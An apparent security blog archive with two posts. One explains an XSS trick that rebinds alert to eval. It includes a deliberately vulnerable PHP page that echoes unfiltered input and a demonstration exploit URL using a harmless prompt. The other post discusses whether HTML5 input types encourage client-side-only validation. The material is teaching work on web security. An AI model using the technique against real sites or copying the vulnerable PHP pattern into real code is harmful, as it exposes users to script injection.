Schlagwort-Archive: Web application

Neat XSS Trick

I just learned a neat XSS trick from a blog post by Andy Wingo. This is old news to the more proficient web application testers among my readers, but it was new to me and I like it. I wasn’t aware that one could redirect function calls in JavaScript so easily:

somefunction = otherfunction;

somewhere in a script makes somefunction a reference to otherfunction. This works with functions of the built-in API, too, so any function can become eval:

alert = eval;

or

window.alert = eval;

So if you can inject a small amount of script somewhere, and a function parameter elsewhere, you can turn the function that happens to be called into the eval you need. This PHP fragment illustrates the approach:

<?php
// XSS vulnerability limited to 35 characters
print substr($_GET["inject1"], 0, 35);
?>

<script>
// URL parameter goes into a seemingly harmless function - which we
// can redefine to become eval
<?php $alertparam = htmlspecialchars(addslashes($_GET["inject2"]), ENT_COMPAT ); ?>
alert('<?=$alertparam?>');
</script>

The first PHP block allows up to 35 characters to be injected into the page unfiltered through the inject1 URL parameter, just enough to add to the page this statement:

<script>alert=eval;</script>

or

<script>window.alert=eval;</script>

The second block embeds the value of the inject2 URL parameter in JavaScript as the parameter of alert() after some (imperfect) escaping. This one has unlimited length but goes into a seemingly harmless function – until somebody exchanges the function behind the identifier alert.

To see it work, put the PHP code on your web server and call it with a URL like this:

xss.php?inject1=<script>window.alert=eval;</script>&inject2=prompt('Did you expect this? (Yes/No)');

This works fine with Firefox 9 and, if XSS filter is disabled, IE 9. Safari 5.1.2 silently blocks the exploit, telling me about it only in debug mode. If you really need to, you’ll probably find an evasion technique against client-side XSS filters. IE seems to need window.alert, while Firefox is happy with just alert in inject1.

Will HTML 5 Promote Insecure Programming? Maybe not.

[Notice for our international readers]

A few days ago the W3C published the first draft of HTML 5. One of the many new features struck me as a possible amplifier for insecure programming: HTML 5 extends the type attribute of the input element to support URLs, e-mail addresses, date, time, and other types. The rationale for the new types reads (emphasis by me):

»The idea of these new types is that the user agent can provide the user interface, such as a calendar date picker or integration with the user’s address book and submit a defined format to the server. It gives the user a better experience as his input is checked before sending it to the server meaning there is less time to wait for feedback.«

Now this is a really old theme in Web (in)security. The Web as a platform for programming invites errors in input validation and sanitation by giving the programmer equally powerful tools for two different domains of trust, the client and the server. Furthermore, client-side input validation does make sense and is desirable under usability considerations but cannot replace server-side enforcement.

Consequently, one all too common mistake in Web application programming is to validate or sanitize data on the client side but not on the server side where one must not rely on any assumptions regarding client behavior. At the first glance abovementioned extensions seem to provoke even more of these mistakes by improving on the client-side features, thus making them more attractive.

The new feature makes generating code easier, though, which means it may become easier to develop and use frameworks instead of hand-coding. This would be good, security-wise, as one framework usually makes fewer errors than hundreds or thousands of programmers.

At this time, both theories seem equally plausible to me. Empirical studies, anyone?